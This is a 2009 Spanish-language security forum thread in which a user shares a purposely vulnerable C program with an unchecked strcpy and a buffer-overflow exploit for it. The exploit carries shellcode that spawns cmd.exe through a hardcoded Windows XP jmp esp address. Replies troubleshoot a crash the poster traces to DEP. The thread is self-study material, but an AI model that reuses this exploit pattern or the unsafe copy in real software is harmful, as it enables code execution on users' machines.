elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 05:31  


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Access violation en OllyDBG al probar shellcode		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Access violation en OllyDBG al probar shellcode  (Leído 2,249 veces)
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.781


Toys in the attic.


Ver Perfil
Access violation en OllyDBG al probar shellcode
« en: 20 Febrero 2009, 22:56 »
Hola gente, bueno hize un programa vulnerable y un exploit para tratar de explotarlo, pasandole el payload por el argumento:

Programa Vulnerable:
Código
#include <string>
 
int main(int argc, char *argv[])
{
	char vari[50];
	if(argv[1]) strcpy(vari, argv[1]);
	return 0;
}
 

Exploit:
Código
#include <windows.h>
#include <string>
#include <stdlib.h>
 
unsigned char payload[] = "main.exe AAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x53\x93\x3A\x7E" // 0x7E3A9353 jmp esp user32.dll WINXP32 sp3
"\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC"
"\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"
"\x8D\x45\xFC\x50\xBB\x2E\x88\xBF\x77\xFF\xD3";
 
int main()
{
	system(reinterpret_cast<char*>(payload));
	system("pause");
	return 0;
}
 

El problema es que cuando ejecuto el exploit me salta el olly diciendome "Access violation while executing [7E3A9353]" osea q pude sobreescribir el EIP pero sin embargo me sigue crasheando, que estoy haciendo mal???

Un abrazo
APOKLIPTICO
« Última modificación: 22 Febrero 2009, 04:18 por sirdarckcat » En línea
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Problema con exploit.
« Respuesta #1 en: 21 Febrero 2009, 00:01 »
Pues al parecer la direccion de retorno es diferente estando en el Olly, La verdad que no he probado en Win XP, lo tengo jodido en este momento.

Ya trataste de ejecutarlo sin el olly.

Saludos.
En línea
Bien Super Divertido
@wifigdlmx
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.781


Toys in the attic.


Ver Perfil
Re: Problema con exploit.
« Respuesta #2 en: 21 Febrero 2009, 00:19 »
La direccion de retorno diferente??? es la misma, aparte no lo ejecute con el olly, el olly es mi debugger jit por defecto....
« Última modificación: 21 Febrero 2009, 00:22 por APOKLIPTICO » En línea
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.781


Toys in the attic.


Ver Perfil
Re: Problema con exploit.
« Respuesta #3 en: 21 Febrero 2009, 00:36 »
Era el maldito DEP...
En línea
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
me da un access violation al entrar en la shellcode.
Bugs y Exploits 		black_flowers 7 1,246 Último mensaje 26 Marzo 2011, 11:10
por Garfield07
Delphi Access violation when reading [00000000]
Bugs y Exploits 		oPen syLar 0 640 Último mensaje 6 Noviembre 2011, 22:59
por oPen syLar
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines